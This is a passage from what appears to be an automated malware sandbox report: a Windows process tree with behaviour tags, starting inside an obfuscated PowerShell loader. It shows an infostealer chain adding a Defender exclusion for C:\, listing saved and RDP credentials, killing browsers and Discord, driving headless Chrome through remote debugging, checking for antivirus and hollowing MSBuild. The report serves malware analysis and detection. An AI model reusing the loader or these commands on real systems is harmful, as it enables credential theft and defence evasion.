Hhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                        6⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Drops startup file
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: AddClipboardFormatListener
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6380
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6816
                  • C:\Users\Admin\AppData\Local\Temp\10416870101\5356e3647e.exe
                    "C:\Users\Admin\AppData\Local\Temp\10416870101\5356e3647e.exe"
                    4⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    PID:5528
                  • C:\Users\Admin\AppData\Local\Temp\10416890101\captcha.exe
                    "C:\Users\Admin\AppData\Local\Temp\10416890101\captcha.exe"
                    4⤵
                    • Executes dropped EXE
                    • Enumerates connected drives
                    PID:7504
                    • C:\Windows\system32\cmd.exe
                      "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_4079603320.txt\""
                      5⤵
                      • NTFS ADS
                      PID:7552
                    • C:\Windows\system32\net.exe
                      "net" statistics workstation
                      5⤵
                        PID:5844
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 statistics workstation
                          6⤵
                            PID:7996
                        • C:\Windows\system32\vaultcmd.exe
                          "vaultcmd" /list
                          5⤵
                            PID:7744
                          • C:\Windows\system32\tasklist.exe
                            "tasklist"
                            5⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:8048
                          • C:\Windows\system32\tasklist.exe
                            "tasklist"
                            5⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:7624
                          • C:\Windows\system32\tasklist.exe
                            "tasklist" /FO CSV /NH
                            5⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:8712
                          • C:\Windows\system32\cmdkey.exe
                            "cmdkey" /list
                            5⤵
                              PID:3868
                            • C:\Windows\system32\tasklist.exe
                              "tasklist"
                              5⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:8648
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious use of AdjustPrivilegeToken
                              PID:8576
                              • C:\Windows\system32\cmdkey.exe
                                "C:\Windows\system32\cmdkey.exe" /list
                                6⤵
                                  PID:8980
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                5⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:8288
                              • C:\Windows\system32\certutil.exe
                                "certutil" -store My
                                5⤵
                                  PID:9072
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  5⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:9144
                                • C:\Windows\system32\certutil.exe
                                  "certutil" -store -user My
                                  5⤵
                                    PID:5940
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:9320
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    5⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:14052
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    5⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:10216
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Hide Artifacts: Ignore Process Interrupts
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:11116
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    5⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:11620
                                  • C:\Windows\system32\cmdkey.exe
                                    "cmdkey" /list
                                    5⤵
                                      PID:11912
                                    • C:\Windows\system32\cmdkey.exe
                                      "cmdkey" /list:TERMSRV/69.48.201.74
                                      5⤵
                                        PID:12128
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:12732
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:13788
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:9724
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:9848
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM chrome.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:9960
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:10056
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM msedge.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:10192
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:10260
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM brave.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:10296
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM opera.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:10488
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:7852
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM vivaldi.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1420
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM chrome.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:7908
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM firefox.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:7916
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM Discord.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:7952
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM dragon.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:7992
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM DiscordCanary.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:10872
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM maxthon.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:10928
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM DiscordPTB.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:11076
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM uc_browser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:11136
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM DiscordDevelopment.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:2540
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM slimjet.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:11332
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM cent_browser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:11468
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM epic.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:11644
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM torch.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:11964
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM whale.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:12064
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM 360browser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:12408
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM qqbrowser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:12744
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM browser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:12860
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM chrome.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:12984
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM msedge.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:13088
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM brave.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:13200
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM opera.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:13320
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM vivaldi.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:13396
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM firefox.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:8068
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM dragon.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:8100
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM maxthon.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:8156
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM uc_browser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:5624
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM slimjet.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:2292
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM cent_browser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:5288
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM epic.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:4036
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM torch.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:5780
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM whale.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:6164
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM 360browser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:6220
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM qqbrowser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:920
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM browser.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:6232
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist" /FI "IMAGENAME eq chrome.exe"
                                        5⤵
                                        • Enumerates processes with tasklist
                                        PID:6492
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41358 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
                                        5⤵
                                        • Uses browser remote debugging
                                        • Checks processor information in registry
                                        • Enumerates system info in registry
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5272
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7fff4045dcf8,0x7fff4045dd04,0x7fff4045dd10
                                          6⤵
                                            PID:6412
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=1912,i,9504363284578558261,9827478249564364035,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1904 /prefetch:2
                                            6⤵
                                            • Modifies registry class
                                            PID:6972
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2020,i,9504363284578558261,9827478249564364035,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1588 /prefetch:3
                                            6⤵
                                              PID:7012
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2336,i,9504363284578558261,9827478249564364035,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2332 /prefetch:8
                                              6⤵
                                                PID:6956
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41358 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2620,i,9504363284578558261,9827478249564364035,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2596 /prefetch:1
                                                6⤵
                                                • Uses browser remote debugging
                                                PID:4724
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41358 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,9504363284578558261,9827478249564364035,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3132 /prefetch:1
                                                6⤵
                                                • Uses browser remote debugging
                                                PID:5280
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41358 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=2192,i,9504363284578558261,9827478249564364035,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2948 /prefetch:1
                                                6⤵
                                                • Uses browser remote debugging
                                                PID:7456
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4540,i,9504363284578558261,9827478249564364035,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4536 /prefetch:8
                                                6⤵
                                                  PID:8012
                                            • C:\Users\Admin\AppData\Local\Temp\10416900101\7IIl2eE.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10416900101\7IIl2eE.exe"
                                              4⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              PID:8504
                                              • C:\Windows\SysWOW64\CMD.exe
                                                "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:8212
                                                • C:\Windows\SysWOW64\tasklist.exe
                                                  tasklist
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:12624
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr /I "opssvc wrsa"
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:12644
                                                • C:\Windows\SysWOW64\tasklist.exe
                                                  tasklist
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:12944
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:12980
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c md 418377
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:13092
                                                • C:\Windows\SysWOW64\extrac32.exe
                                                  extrac32 /Y /E Leon.cab
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:13160
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr /V "BEVERAGES" Compilation
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:13612
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:13672
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:13716
                                                • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                  Passwords.com N
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:7440
                                                • C:\Windows\SysWOW64\choice.exe
                                                  choice /d y /t 5
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:13808
                                            • C:\Users\Admin\AppData\Local\Temp\10416910101\XOPPRUc.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10416910101\XOPPRUc.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:10340
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                5⤵
                                                  PID:10600
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:10608
                                              • C:\Users\Admin\AppData\Local\Temp\10416920101\h8NlU62.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10416920101\h8NlU62.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:11816
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:11864
                                              • C:\Users\Admin\AppData\Local\Temp\10416930101\4142f7927d.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10416930101\4142f7927d.exe"
                                                4⤵
